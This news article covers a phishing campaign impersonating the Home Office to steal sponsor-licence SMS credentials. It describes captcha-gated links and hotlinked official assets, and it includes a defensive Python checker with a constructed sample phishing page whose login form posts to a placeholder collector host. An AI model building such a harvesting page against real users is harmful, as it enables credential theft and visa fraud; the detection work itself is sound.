A sophisticated phishing campaign is actively targeting UK organisations that hold sponsor licences by impersonating the Home Office, the Mimecast Threat Research team has revealed. The attackers aim to steal login credentials for the Sponsorship Management System (SMS), which is used to manage visa sponsorships. This poses a significant risk of financial loss and data theft for affected organisations.
How the scam works
The campaign begins with phishing emails that closely mimic legitimate Home Office communications. These emails warn recipients about urgent compliance issues or potential account suspensions and include links to fraudulent websites. These sites are near-perfect copies of the official SMS login page, designed to harvest User IDs and passwords.
To bypass security filters, the attackers use captcha-gated URLs. After the user completes the captcha, they are redirected to the phishing page, which hotlinks official assets from the real site, making the fake login page very convincing. However, the form on the phishing page sends credentials to an attacker-controlled server rather than the legitimate Home Office system.
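The mismatch described above, assets hotlinked from the real site while the login form posts somewhere else, can be checked mechanically once a page's HTML has been captured. The following is an added example, not taken from the Mimecast research; the host names and the sample page are constructed placeholders, and the function names are hypothetical.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

class _Collector(HTMLParser):
    """Collects asset URLs and the targets of forms that contain a password field."""
    def __init__(self):
        super().__init__()
        self.assets, self.forms, self._form = [], [], None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag in ("img", "script") and a.get("src"):
            self.assets.append(a["src"])
        elif tag == "link" and a.get("href"):
            self.assets.append(a["href"])
        elif tag == "form":
            self._form = {"action": a.get("action") or "", "password": False}
            self.forms.append(self._form)
        elif tag == "input" and self._form and (a.get("type") or "").lower() == "password":
            self._form["password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._form = None

def _host(url, base):
    # Resolve relative URLs (including an empty form action) against the page URL.
    return (urlparse(urljoin(base, url)).hostname or "").lower()

def _is_trusted(host, trusted):
    return any(host == t or host.endswith("." + t) for t in trusted)

def check_login_page(html, page_url, trusted_hosts):
    """Flag password forms on an untrusted page that borrows assets from a trusted host."""
    if _is_trusted(_host(page_url, page_url), trusted_hosts):
        return []  # the page itself is served by the trusted site
    c = _Collector()
    c.feed(html)
    hosts = {_host(u, page_url) for u in c.assets}
    hotlinked = sorted(h for h in hosts if _is_trusted(h, trusted_hosts))
    return [{"form_target": _host(f["action"], page_url), "hotlinked_from": hotlinked}
            for f in c.forms
            if f["password"] and hotlinked
            and not _is_trusted(_host(f["action"], page_url), trusted_hosts)]

# Constructed sample page: official.example stands in for the genuine site.
SAMPLE = """<html><head><link rel="stylesheet" href="https://sms.official.example/site.css">
</head><body><img src="https://sms.official.example/crest.png">
<form method="post" action="https://collector.lookalike.example/submit">
<input name="userid"><input type="password" name="pw"></form></body></html>"""
```

A finding names the host that would receive the credentials and the trusted hosts the page borrows assets from; the same hotlinking also shows up in the genuine site's web logs as asset requests carrying an unfamiliar Referer.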
Consequences of compromised accounts
Once the attackers have obtained SMS login details, they exploit the compromised accounts in several ways. They may sell access on dark web marketplaces, issue fraudulent Certificates of Sponsorship (CoS), or carry out extortion schemes against the organisations. One common fraud involves creating fake job offers and charging victims between £15,000 and £20,000 for non-existent employment opportunities. This allows criminals to create seemingly legitimate visa documentation, enabling large-scale immigration fraud.
Impact on visa applicants
This phishing campaign also puts visa applicants at risk. Criminals using compromised SMS accounts can issue fake Certificates of Sponsorship, which support visa applications for jobs that do not exist. Applicants who fall prey to such scams may pay large sums for fake sponsorships, only to have their applications rejected or face legal complications. This undermines trust in the UK immigration system and harms genuine sponsors and applicants.
Applicants are advised to verify any job offers or sponsorships directly with the employer and through official Home Office channels. They should be cautious of unsolicited job offers demanding upfront payments and report suspicious communications to the Home Office or immigration authorities.
Sponsor licence holders and visa applicants alike must stay vigilant to protect themselves from these scams and maintain the integrity of the UK’s immigration process.